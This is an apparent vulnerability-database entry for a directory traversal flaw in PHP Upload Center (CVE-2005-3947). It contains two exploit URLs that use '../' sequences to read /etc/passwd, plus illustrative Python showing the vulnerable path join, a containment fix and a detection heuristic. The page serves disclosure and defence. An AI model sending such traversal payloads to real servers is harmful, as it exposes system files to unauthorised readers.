PHP Upload Center index.php Directory Traversal Vulnerability

Vulnerability ID 1109349 Vulnerability type Path traversal
Published 2005-11-29 Updated 2006-09-22
CVE CVE-2005-3947 CNNVD-ID CNNVD-200512-028
Platform PHP CVSS score 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/26646
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-028
|Vulnerability details
The index.php script of PHPUploadCenter contains a directory traversal vulnerability. A remote attacker can read arbitrary files on the server by supplying "../" sequences in the filename parameter.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/15621/info

PHP Upload Center is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input: the filename parameter passed to index.php with action=view is used to locate the file to serve without the "../" sequences being stripped or the resulting path being checked against the upload directory.

An attacker can exploit this issue to retrieve arbitrary files from an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

http://www.example.com/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
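The following Python example is added here for illustration and is not code from PHPUploadCenter or from any of the sources listed on this page. It models the pattern the advisory describes (a user-controlled filename joined onto an upload directory) next to a containment check that rejects the traversal payloads from the URLs above. The upload directory path, the function names and the sample URLs are assumptions; the page does not show the application's own source.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Hypothetical location of the upload directory on the affected server.
# PHPUploadCenter's real layout is not known from the advisory.
UPLOAD_DIR = "/var/www/html/upload/files"

# The payload from the exploit URLs above: enough "../" to reach "/" from
# any plausible depth. Excess ".." components at the root are simply dropped,
# so the attacker does not need to know the exact depth.
TRAVERSAL_PAYLOAD = "../../../../../../../../../../../../../../../../etc/passwd"


def filename_from_url(url):
    """Extract the filename query parameter exactly as the web server would
    hand it to the script (percent-decoded once by parse_qs)."""
    params = parse_qs(urlsplit(url).query)
    return params.get("filename", [""])[0]


def naive_path(base_dir, filename):
    """The vulnerable pattern: concatenate the directory and the user-supplied
    name and open whatever that resolves to. posixpath.normpath is used here
    only to show where the OS would end up; it performs no validation."""
    return posixpath.normpath(posixpath.join(base_dir, filename))


def safe_path(base_dir, filename):
    """Hardened resolution: normalise the candidate path, then require it to
    lie strictly inside base_dir. Returns None when the request escapes
    (via "../", an absolute path, or an empty name that maps to the
    directory itself)."""
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, filename))
    if candidate == base or not candidate.startswith(base + "/"):
        return None
    return candidate


def is_traversal_attempt(filename):
    """Cheap detection heuristic for log review: a viewed filename should be a
    plain name, never contain a parent-directory component or be absolute."""
    parts = filename.split("/")
    return filename.startswith("/") or ".." in parts


def check_request(url, base_dir=UPLOAD_DIR):
    """Return (what the vulnerable code would open, what the hardened code
    would open or None) for one request URL."""
    name = filename_from_url(url)
    return naive_path(base_dir, name), safe_path(base_dir, name)


if __name__ == "__main__":
    # Constructed sample requests: the two exploit URLs from the advisory and
    # one benign download.
    samples = [
        "http://www.example.com/upload/index.php?action=view&filename=" + TRAVERSAL_PAYLOAD,
        "http://www.example.com/instaladores/index.php?action=view&filename=" + TRAVERSAL_PAYLOAD,
        "http://www.example.com/upload/index.php?action=view&filename=report.pdf",
    ]
    for url in samples:
        opened, allowed = check_request(url)
        flag = "TRAVERSAL" if is_traversal_attempt(filename_from_url(url)) else "ok"
        print(f"{flag:9} vulnerable opens: {opened:<40} hardened opens: {allowed}")
```

The check uses posixpath so it runs identically on any host; in a real handler, resolve the candidate with os.path.realpath (or PHP's realpath()) against the live filesystem so that symlinks inside the upload directory cannot be used to point outside it, and apply the same containment test to the resolved path.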
|References

Source: XF
Name: phpupload-index-directory-traversal(24696)
Link: http://xforce.iss.net/xforce/xfdb/24696
Source: BID
Name: 15626
Link: http://www.securityfocus.com/bid/15626
Source: BID
Name: 15621
Link: http://www.securityfocus.com/bid/15621
Source: MISC
Link: http://www.blogcu.com/Liz0ziM/126975
Source: MISC
Link: http://liz0.3yr.net/phpuploadcenter.txt